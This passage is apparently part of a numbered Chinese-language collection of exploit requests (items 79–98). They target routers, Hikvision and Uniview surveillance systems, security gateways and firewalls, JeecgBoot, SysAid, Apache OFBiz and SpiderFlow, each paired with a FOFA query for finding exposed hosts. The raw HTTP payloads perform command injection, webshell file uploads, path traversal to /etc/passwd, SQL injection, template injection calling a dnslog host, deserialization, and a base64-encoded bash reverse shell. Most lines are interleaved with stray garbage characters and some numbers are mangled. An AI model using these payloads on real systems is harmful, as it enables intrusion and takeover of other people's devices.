GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
) r, n. ~- ~: q1 G! ^9 U$ {Host: x.x.x.x
$ x Q( I E9 q; V* F/ \( g
5 g" D' X }& A2 _) Z d3 Y# T7 {; m
79. BYTEVALUE 百为流控路由器远程命令执行+ p" t5 T f. K f: V& g* ?2 m2 {
FOFA:BYTEVALUE 智能流控路由器
! q' I7 w* `9 r2 s6 Y) D/ ~; nGET /goform/webRead/open/?path=|id HTTP/1.1
4 X1 ^ x; t7 K3 a( }8 C; W7 THost:IP
4 _! L9 B `$ g9 v% j5 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
2 d; M7 L1 G4 t. _ R. G. oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: y I% W& o) t# w% N% ]) Z+ t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 v# p( S8 R4 X: _Accept-Encoding: gzip, deflate
: j6 y" E5 b4 r" J( pConnection: close
8 D! D1 `4 A7 NUpgrade-Insecure-Requests: 1
* g! E; m4 U0 W
: y9 c( l2 _& b7 ^
1 Q; ~/ d! |) w3 ?% T2 H9 x80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# e/ w3 I% b1 d9 ~* V* B, gFOFA:app="速达软件-公司产品"( u7 @$ D( R3 T# h1 }
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
! |: ?- A; B4 b0 j0 BHost: x.x.x.x& m- W+ I4 J. ^$ C; Q1 \' |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 X- P3 c( f: H( {; R) P/ H3 wContent-Length: 27
5 v0 R" |) t7 e% p6 P. KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* F2 K' f, ]$ @
Accept-Encoding: gzip, deflate
5 |9 ^/ {1 G5 E" P, v5 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- [ D6 b4 G- V
Connection: close
8 u+ S8 e7 ]1 }; g4 x N% Z9 Z/ JContent-Type: application/octet-stream
9 q* n9 }/ y* {* [8 ~0 t& @: N% w) AUpgrade-Insecure-Requests: 16 x1 V$ H# Y( ~! ]
8 K3 w$ @+ O; g$ E5 d3 q+ o
<% out.print("oessqeonylzaf");%>; N7 m. f5 q4 l {. n0 N3 T% E
" f8 u4 H+ x: r4 C$ r0 a) S% K5 |
& i3 W) K' X/ TGET /xykqmfxpoas.jsp HTTP/1.1
7 S9 _9 R! A4 W8 iHost: x.x.x.x
9 C! [0 ^6 [4 u! IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 `+ _8 F1 ~" B( m; B
Connection: close
6 D( }9 s/ z9 |. C: eAccept-Encoding: gzip) x: Q) G$ J+ f4 a- I, p# S2 r
{5 |* Y0 r g% u$ D
" A7 ?9 Q% w0 k" z4 F5 i- }* w81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% t* ^) e) Y) ?( t, P0 E4 CFOFA:app="uniview-视频监控"3 z4 m6 h+ q" ~+ [2 q( E# X2 ?
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1) D1 h/ X4 s0 R5 A2 Q
Host: x.x.x.x
5 _, i! t6 {6 C1 R) IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" e: W2 M: p3 B/ |! }- V" q) WConnection: close9 n; E7 P) u' {8 |1 @4 ~
Accept-Encoding: gzip
, y+ f/ M: h- ~& \
+ O+ l, s( K9 \/ V- o/ Y3 g7 U3 `
/ ^6 ^: b* H4 ~, F9 d1 i" f9 U82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
$ z) w! [- T2 P2 J. Z! d6 L0 UFOFA:app="思福迪-LOGBASE" I& A* x0 X6 F& U- b
POST /bhost/test_qrcode_b HTTP/1.16 q/ O% y# L. W1 k
Host: BaseURL
$ I+ P0 V3 Y1 w; u/ zUser-Agent: Go-http-client/1.14 `% w, V Y- ~
Content-Length: 236 d1 q: @+ w. F) U2 S2 f* _3 C
Accept-Encoding: gzip3 k( U8 h# L: \$ Q. o7 ]. O
Connection: close% L. [1 J% e% `) e$ R
Content-Type: application/x-www-form-urlencoded3 N7 K* U0 L8 ~
Referer: BaseURL* j Z, G2 T, v& S1 l
3 I7 L" C; ^0 f( q, S
z1=1&z2="|id;"&z3=bhost$ f; R B8 D+ w" l3 Y( w8 m7 J
w) q2 A H m7 }# _( \2 D) a9 Q' P1 r0 U+ [
83. JeecgBoot testConnection 远程命令执行
, _: o9 t! _. G7 MFOFA:title=="JeecgBoot 企业级低代码平台"' W3 `* r( e6 c0 x
% O# K8 d$ C7 B2 J, W3 y, a2 u
! h, Q2 E/ x3 r1 [, ?: pPOST /jmreport/testConnection HTTP/1.1
- X z, h: \. n# O* Q( q8 }Host: x.x.x.x
; s" D( b( D5 L/ k. FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# F' N6 b! g7 L v' B8 n6 b) LConnection: close
1 _. k K0 A) b. vContent-Length: 88811 l- R9 k G1 I- Y) q( a
Accept-Encoding: gzip
& m% G" I" z0 L0 S& iCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
/ z G# V: W3 @$ S1 {% a0 E( M7 RContent-Type: application/json
3 U2 R# x% Z8 D/ K2 I, a" @' q! g
$ A3 b0 {, u2 ~& h7 TPAYLOAD
+ k+ W+ ]% L6 B% E$ c9 C: q8 R ~! H3 U- C4 t3 C5 Q; D
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
6 p& y& Z' ]; V" ~FOFA:title=="JeecgBoot 企业级低代码平台"3 g: @6 i9 d3 F# a& X( u* G
- t" |( v6 j. p( ^5 r
) Z- ]' i8 R8 ~& T; W3 y$ Z
/ U9 G2 W8 I+ I; U% t, H% TPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
/ }$ d3 ~# {+ w$ ~1 B2 c7 f0 ^Host: 192.168.40.130:80803 R1 ]' x; J3 C3 |! T9 I
User-Agent: curl/7.88.1
/ E2 n0 j& C! W; TContent-Length: 156' g3 K3 h7 b7 M8 B+ w/ i
Accept: */*
8 \$ ~2 |& `" w& K* |/ eConnection: close6 i2 J4 J6 J A0 `5 `( W
Content-Type: application/json
8 e, R) z% D0 x/ ]* e c0 M7 |Accept-Encoding: gzip4 L, U+ U2 N5 x1 y
" l0 Y9 p3 ^, n1 \; q2 @* l{
4 i) {5 o) P" y' V2 F "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",% E! `) E" W5 B( ~" W' a
"type": "0"7 E+ u8 p( q: s! R( c
}7 ]1 h5 I' b: Y; {; w0 p
, B) L$ @( M$ [: i( H
( G% U- Y7 D0 H0 i; v85. SysAid On-premise< 23.3.36远程代码执行, j1 Q3 M- [% R* {5 G/ g
CVE-2023-472460 a0 h! P- s- V; j
FOFA:body="sysaid-logo-dark-green.png"
4 X. v; C7 g% f4 N- rEXP数据包如下,注入哥斯拉马
0 g" b/ h- O% bPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
- Z, Y) o; Y$ h( \+ }. m/ YHost: x.x.x.x9 R" m% i, Y- q1 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) R- B' K7 g j$ N
Content-Type: application/octet-stream U5 q$ R; P. E. g+ i' o5 X( o3 `
Accept-Encoding: gzip
4 i0 a2 d! C, c2 z& v( Y5 A
$ i1 A- t6 _ E% |7 e, g, `PAYLOAD
+ C) J' }" n6 [ K. m) w0 z8 t! U$ q, h$ F; q& @$ ]; Q% A
回显URL:http://x.x.x.x/userfiles/index.jsp
) u* y% X5 C( G) }2 e3 i9 U% U& Z2 K8 s+ w% |* K8 ^ r3 J
86. 日本tosei自助洗衣机RCE
$ x0 y9 }6 ~* B2 iFOFA:body="tosei_login_check.php"
6 Q6 \7 V: {$ sPOST /cgi-bin/network_test.php HTTP/1.1
' a k' G9 l! O2 M* DHost: x.x.x.x, A2 O8 G: j" r. i1 s0 m
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36, L/ o6 g `: C {4 C! p- u
Connection: close( ^# D0 J m, P2 l
Content-Length: 44
\3 a- u! M8 BAccept: */*
7 {5 }1 ?8 K9 W$ n4 \Accept-Encoding: gzip8 a; z, T* X w0 H. O0 q
Accept-Language: en
, C$ h2 ~! n) SContent-Type: application/x-www-form-urlencoded5 c) k+ k* E. O7 o# k/ z2 j: ?
% A0 Y8 W3 n* P2 c
host=%0acat${IFS}/etc/passwd%0a&command=ping& g6 b# t/ F! }
: F1 Y( q( I3 X# j- X, Q
1 B# i( Z* _: Q" z: I" n
87. 安恒明御安全网关aaa_local_web_preview文件上传
+ d7 S8 k o! O3 y6 I" R: BFOFA:title="明御安全网关"
]$ U! W* s: z7 t' L/ FPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1( y6 J( w: W) e# H/ n, \6 D& b3 v
Host: X.X.X.X
" W5 x: V( v, _" w3 YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 S' q* F$ X& ?7 L3 d* T
Connection: close
- T5 L, U, G4 Q* d6 W; M( j. q8 oContent-Length: 198
3 m+ O0 a5 _! Y6 U) I3 m% Z LAccept-Encoding: gzip
7 h; Y% C- s: u% b MContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd# O1 L0 x/ S& N; g) P9 N! U" M% q
' Y0 ^. ?/ p1 U# U% r6 {--qqobiandqgawlxodfiisporjwravxtvd3 z& S7 m; n) ?$ ]
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
5 ~2 y. T& \1 S- y! Z7 KContent-Type: text/plain {7 [1 m5 E) \0 t; D- P
, o: Q: C; f7 g9 m- c L
2ZqGNnsjzzU2GBBPyd8AIA7QlDq1 T4 _/ ?' G5 b
--qqobiandqgawlxodfiisporjwravxtvd--# E+ u9 p3 M0 M! p) Y' ^7 g C
( M) { n! J G5 x5 E/ H. J1 S0 I( v. u% `, K4 R( b5 y
/jfhatuwe.php
+ C! s% Y( v$ x
4 U* E) q9 z$ x T8 m+ F2 l88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行- Z8 P1 k, v3 p1 I$ t& V+ h
FOFA:title="明御安全网关"* ^2 }7 o4 y8 D+ @
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
* W. T, U6 G9 b7 J0 \$ THost: x.x.x.xx.x.x.x
1 Q) Z8 m! l1 O, O. a9 y- RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) o- J& r, j4 S6 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 V4 \% O5 e, J* l Z
Accept-Encoding: gzip, deflate
% L8 l3 Z$ ?+ ?# [2 u* H) eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& J% t) K( W+ k: O
Connection: close- |7 c4 k' D" g
6 k |9 D6 `# j2 V
# Z6 m% O5 l" v1 W' K' i' |4 B9 T, B/astdfkhl.php& ^/ ?$ V! d- L, g
! `" r! @, e/ q2 y" f3 Y89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 H% z7 x" t# KFOFA:title="FE协作办公平台" || body="li_plugins_download"* Z, v: r1 o1 K& \. e; k7 W+ }( I+ s) H
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
! t6 S8 A0 Z5 H' ZHost: x.x.x.x7 Y8 j, y3 W' g1 s! q$ Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 Z# B" u1 V* M4 ?: ~/ kConnection: close
8 Q% z/ g, }5 _- NContent-Length: 416 h) a) O* L. F4 z. U
Content-Type: application/x-www-form-urlencoded* l( I% a( k6 w* _8 } r9 i
Accept-Encoding: gzip
9 C g, B# C# T1 U( m; i2 \/ T o. [3 h5 ^5 ]
option=2&GUID=-1'+union+select+111*222--+
9 b* l H7 ~# F& p5 T2 M1 A3 i& e$ u; X& i) T' M+ q1 W
% N; D. w2 H8 x- D1 _: s) e90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行1 _, u- K& A" }7 v. }, x% T+ [
FOFA:icon_hash="-1830859634"& m! d) p6 V+ _& K0 i
POST /php/ping.php HTTP/1.1
) s/ | G( E8 b! T) }# m" bHost: x.x.x.x$ N& k7 P7 P" Q- r% O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
1 K+ Z4 J' Y8 AContent-Length: 51! a9 j3 o& q# {- e7 x2 U
Accept: application/json, text/javascript, */*; q=0.01( `1 F- _' w$ R3 Q! l5 }
Accept-Encoding: gzip, deflate7 ^8 g1 I. a4 D# v( T+ r" G3 o, \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 l( V1 R0 t: fConnection: close: [1 ?' O! S' e% m
Content-Type: application/x-www-form-urlencoded' W" ]3 Q* e9 b( j6 g- S8 n0 n+ _/ k
X-Requested-With: XMLHttpRequest' y. e. H& Z% b# v+ d4 L
2 N1 L ^" R9 c% l
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
" M% l+ Z4 }; j$ m/ {
9 s- W% u9 {2 L. g) b( B: V# D/ B( S, w& _, B
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
# u4 f- A! \+ S1 W2 sFOFA:title="综合安防管理平台": |; r- @6 t! h) ?( O/ t
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1* G: P# Y$ r: I3 O2 N& O5 m
Host: your-ip
) v* V! ^2 R) }9 Z7 E+ _) k. wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ d- M1 I% F4 U, {! G1 xAccept-Encoding: gzip, deflate- X% i; C p' R q( X: @1 L
Accept: */*
f" t3 }8 a9 W& iConnection: keep-alive4 d) b% j* f6 g) l+ P8 |' m
/ }4 X0 V" @+ a: L2 t* h
: P' d! n2 r3 d; h) j, q. n4 R# S5 C' e. ?5 |+ }2 |( L
92. 海康威视运行管理中心session命令执行
+ Q/ t+ O- Z/ l9 \9 ~/ O+ A* tFastjson命令执行
. b5 P/ e+ Q- m5 g8 w- S) phunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"7 X; ?0 e/ @ J3 e/ @
POST /center/api/session HTTP/1.11 u7 y# r* @5 M" \5 t
Host:
+ k1 K9 t: G# Z+ m2 SAccept: application/json, text/plain, */*
/ ]: i+ Y3 m3 s: [* a( i! vAccept-Encoding: gzip, deflate
+ F$ @' H- Y3 {! v2 lX-Requested-With: XMLHttpRequest* _3 v5 f4 \. b
Content-Type: application/json;charset=UTF-88 v7 S9 d. s( g0 t
X-Language-Type: zh_CN) f2 u- R$ [1 k, k8 Q7 t: W
Testcmd: echo test
: C3 R, r1 z4 r+ v; C7 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
& a5 Z, a4 ]* R* [Accept-Language: zh-CN,zh;q=0.97 ^# |8 Z; H0 V% e3 f& g
Content-Length: 57780 ?" {, {) D0 s" |% \
* f- @: S# k8 O3 b' iPAYLOAD
2 Y( e7 q) Y$ C- `" g2 A. }* Y0 X# s8 A! o+ Q7 i% l
4 a* d/ C( S% o3 K: B2 S8 Z" {3 q93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 b! G4 S: K I& s! j a, B* r- c
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="0 Z7 ~2 `# w" R, E8 N* r
POST /?g=app_av_import_save HTTP/1.11 @: i4 L% q7 T, U2 k2 Z
Host: x.x.x.x
* U B6 b7 v* zContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx/ m, W! d9 S- e2 K& O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 L, }: N4 @& B/ K9 W8 X
% [. T) u' d$ U4 C0 F- I1 V------WebKitFormBoundarykcbkgdfx
- @# m& H" ]! fContent-Disposition: form-data; name="MAX_FILE_SIZE"
; Q/ w- d# r$ q. [( g$ S
8 A* b1 u9 u* A. e10000000: m( I' S& ~) s$ L) @
------WebKitFormBoundarykcbkgdfx
8 E: p; f2 Q, e8 A: }Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
+ A0 ^5 Y+ P# w, V6 v j6 Z& oContent-Type: text/plain
2 p) b% Q, ^: W" _1 [/ Y* _9 S
5 E1 L6 n" n% ]wagletqrkwrddkthtulxsqrphulnknxa
& Z6 s# t% |" W- q" j------WebKitFormBoundarykcbkgdfx
; h: p* l5 p6 }* {Content-Disposition: form-data; name="submit_post"
$ }8 P) j1 u, Z+ E G* c5 U2 c: J# R9 N" b
obj_app_upfile4 ]: Q& \( ?# K x8 h- u
------WebKitFormBoundarykcbkgdfx4 h" R6 M4 E4 J' X' @+ a. Q
Content-Disposition: form-data; name="__hash__"
4 i4 V( ~+ n$ I* S' l h/ ?! L& y/ v/ G- L
0b9d6b1ab7479ab69d9f71b05e0e9445+ [; ?$ f" ~+ c8 |/ j
------WebKitFormBoundarykcbkgdfx--
: C4 C. w4 n; M; t: n) j2 k" [
2 F% }9 L/ s B& j) A5 h" x- R% R3 G9 u9 g( b- l
GET /attachements/xlskxknxa.txt HTTP/1.1
/ ?2 T' v9 H# b, B, C# d! `Host: xx.xx.xx.xx; m% p: X% m: n4 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% o" r' j# m9 _" {! A/ j( W0 H
\0 E- w' X/ B% i! B% q9 {
& v9 T/ R, q; `3 u( ~7 N% O n94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
8 l( S# ^! S& f: B }+ HFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="4 F0 D* @5 L% x, E# Z( n8 I
POST /?g=obj_area_import_save HTTP/1.1
; Y/ I6 [+ j5 E- nHost: x.x.x.x. H+ l# i% g, S" j5 |" s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
9 x. K0 n1 j3 g% Y/ c; YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' R$ s3 ^7 k( n* e# Y4 ~3 C) G$ j+ ]1 C( I- c/ x$ j9 `+ O
------WebKitFormBoundarybqvzqvmt
0 O- _1 ^& r1 w0 fContent-Disposition: form-data; name="MAX_FILE_SIZE"
4 b; n3 q; H; k6 |5 J. Y7 f
# z8 [7 S( b% Y% p, I10000000
# Q |, l- h1 t' t------WebKitFormBoundarybqvzqvmt
, \% q+ w. @9 M" gContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"# H( B" k/ j0 Y+ G9 A/ [2 F" q
Content-Type: text/plain$ h& N# n8 p0 {( d4 |" F
/ _$ E$ w& p+ d7 F3 P1 v8 O
pxplitttsrjnyoafavcajwkvhxindhmu# [8 S! D' f4 N% Z; B
------WebKitFormBoundarybqvzqvmt- a4 i! z& N# Y @3 ^. G
Content-Disposition: form-data; name="submit_post"1 b! L, |/ X, H( c" c6 I; [7 b+ _' q
j5 f$ V9 E% oobj_app_upfile* Y$ i( N* U2 G3 l! R, x& t* H. i4 K
------WebKitFormBoundarybqvzqvmt
$ }+ p2 K& o% X0 M$ e- SContent-Disposition: form-data; name="__hash__"; S. c' G8 I& x, R& c& {0 M
- R! f! G$ s: I% ?0b9d6b1ab7479ab69d9f71b05e0e9445
6 {% `* M# Y2 S# a" a5 I& F1 [------WebKitFormBoundarybqvzqvmt--7 m/ M& L) T4 u+ g+ E% @! f' U" g3 t
+ X! N! ?+ I3 Q% p& C& t# L4 G& F5 a1 v) W2 c
% h$ M6 V" N% Q7 ~) Z
GET /attachements/xlskxknxa.txt HTTP/1.1
' w' D( J4 n6 g4 Y$ u! D% r$ iHost: xx.xx.xx.xx
. N( c# R& e1 _0 E! r" R3 w4 jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 ~) n% h P1 D" @0 U. @4 f7 R J f E; |. o
0 `# @' @6 k2 J/ F7 k! @; H& a# `3 v4 ?" a
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行5 b; n: J0 g/ D l7 j. l# u
CVE-2023-490706 z' x, F! P: W5 p8 I
FOFA:app="Apache_OFBiz"6 `( Q* t2 K$ f9 a5 n
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1# ~- A% _) i% e5 Y$ X
Host: x.x.x.x
: K# W, H2 w* F: [6 h& v. qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( }& a% }) Y% _, |2 O
Connection: close5 c1 b; Y% h! c' q" N& H
Content-Length: 889
) V/ x. Y% n/ ` yContent-Type: application/xml6 j# a) q. {* n! p* ^
Accept-Encoding: gzip
0 }% L. I8 o1 y& E9 Q
/ ~7 n0 o# U$ H% y E$ T6 L<?xml version="1.0"?>" n2 N9 S8 s: A6 A
<methodCall>1 b4 U9 l9 s& c$ R- l5 n8 h
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
" s( }2 y" Y0 Z/ F* [ <params>4 C2 K* z* {3 b5 O8 p8 I& L
<param>
* P9 ?! z) M( {+ ?& C- O <value>( I6 u# b3 A: a7 m2 l
<struct>8 E0 b) J% W# b
<member>( b# D/ F* A% g9 @, z
<name>test</name>
7 d1 o3 s+ D V2 @: Y5 z( {$ p <value>4 K, b$ \% H9 q% G/ U& j9 r
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>) [6 e' _3 l2 ]6 U, T) l
</value>3 u0 C- a! S) b; [3 A
</member># Z7 b/ B9 M) B
</struct>+ P3 F5 q0 Y# Q& ~: D
</value>) D: `+ d5 a' B: y+ w
</param>
: u8 k* M0 h! m </params>
7 m4 L+ [: b- w* e, u# l</methodCall>
5 `% T0 B. C H3 u& A, d! H. W2 \. S& |" T% Y" m$ s& }0 S8 g
, @' X: H9 P5 ]0 Y8 d4 x用ysoserial生成payload- x6 p# L% l/ F0 H4 c
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
+ H j W/ [' v! t3 X4 i) O& E0 U& t3 Z2 m# O% n+ A& P: b
! G a: U) P: |- x* j. U
将生成的payload替换到上面的POC C( Q2 S; ?4 r( w9 v% C" {
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1- p$ n$ k7 _! {
Host: 192.168.40.130:8443! M( T2 @* @: v, ^5 s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36* r; d( j# g7 t! I. q6 ^$ [
Connection: close% y" u) ?) [" N. x
Content-Length: 8891 T( w. [1 ^8 o" e- H+ c( b3 d
Content-Type: application/xml
1 X" o# U8 V+ [3 QAccept-Encoding: gzip* A" |. X" l1 A7 Q3 J6 B/ M
4 n' ~3 _/ S# z' f3 YPAYLOAD
1 ?9 t) x( n( X9 {- ~. p* m+ c, u" }( D/ N- r- U
96. Apache OFBiz 18.12.11 groovy 远程代码执行
) P5 l; f% l' m2 OFOFA:app="Apache_OFBiz"1 ]3 {0 `: ]- i5 n4 N
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1) G' v: o! B* _$ `8 a
Host: localhost:8443
& w' j; t& v2 Y9 Y* C+ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! w# {% `" D) S4 r* g0 H. |Accept: */*) Z$ j6 P# Q4 w; c: }$ }5 O& F
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; w4 Z2 n; F, n% x6 r
Content-Type: application/x-www-form-urlencoded
+ R/ n: B0 l$ ~Content-Length: 55/ I" m# Y- j# W
. t9 U3 [( D/ N3 V3 ZgroovyProgram=throw+new+Exception('id'.execute().text);0 X/ Q# F r, h/ g7 j
% u: B5 l* G' B+ z/ b- V
) m t4 f* H& C' o. n$ W$ `
反弹shell/ h, k: {; L! P; G' X4 Q
在kali上启动一个监听
4 h4 \& H- b, Q& W5 n |9 \" tnc -lvp 7777
) `4 ^7 J0 x/ L' a1 m0 b! j# |1 s% d# O6 u) a% o* T
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- `( o8 I) P% q0 D6 y/ CHost: 192.168.40.130:84439 \# D+ {. V; `& x8 o9 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: c3 f) o( {8 w% qAccept: */*+ d g+ C, b; j7 K0 t! o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 Y0 F4 x* E5 m9 _
Content-Type: application/x-www-form-urlencoded4 U) X6 M: [6 ^5 y
Content-Length: 71$ D2 C. s2 z4 }5 U0 u8 L
8 t8 N" P- E1 f+ D1 E, w: dgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
7 @- `, A& d( M( ~
( }1 d- B8 S" M' H" T. k7 T/ U( \# e# a97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行4 w* N, c, [+ @" l! E
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
/ v6 T- ]+ J! F. J% s7 J; Y5 ~GET /passport/login/ HTTP/1.12 Y _- t$ \! l: c7 F% p
Host: 192.168.40.130:8085
. K( r8 j& p" M6 U" ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 n M- I# f- B# m+ B3 @4 q
Accept-Encoding: gzip
- _% w w5 v, y: p7 ^Connection: close
+ W6 n( i3 T* c( [1 q, XCookie: rememberMe=PAYLOAD* W9 }3 Y8 `2 F/ w& D
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"2 W: m+ T5 K6 }9 {. L7 N
0 t6 R7 ]" p1 f, v, h* |) ?8 w- J( p# E2 u" r) N
98. SpiderFlow爬虫平台远程命令执行6 ^. q3 {& v9 B" u
CVE-2024-0195
0 r" B0 i V; UFOFA:app="SpiderFlow"/ G/ r+ L; H& [# j
POST /function/save HTTP/1.1( s m1 U5 @; P7 b2 `
Host: 192.168.40.130:8088! ]/ ~# Q/ l9 B9 |" v4 a/ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' N6 X2 N/ E/ I
Connection: close" }! X+ e' ~% b c4 g2 h8 f7 ~
Content-Length: 1210 h% N7 h7 q6 R8 M9 I* z
Accept: */*
8 l$ h1 n1 G$ g5 Y* w MAccept-Encoding: gzip, deflate# F3 E: I/ R i6 B U+ G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) `# q4 U' L- E& c3 d0 uContent-Type: application/x-www-form-urlencoded; charset=UTF-83 a/ A$ w& i! r+ t
X-Requested-With: XMLHttpRequest
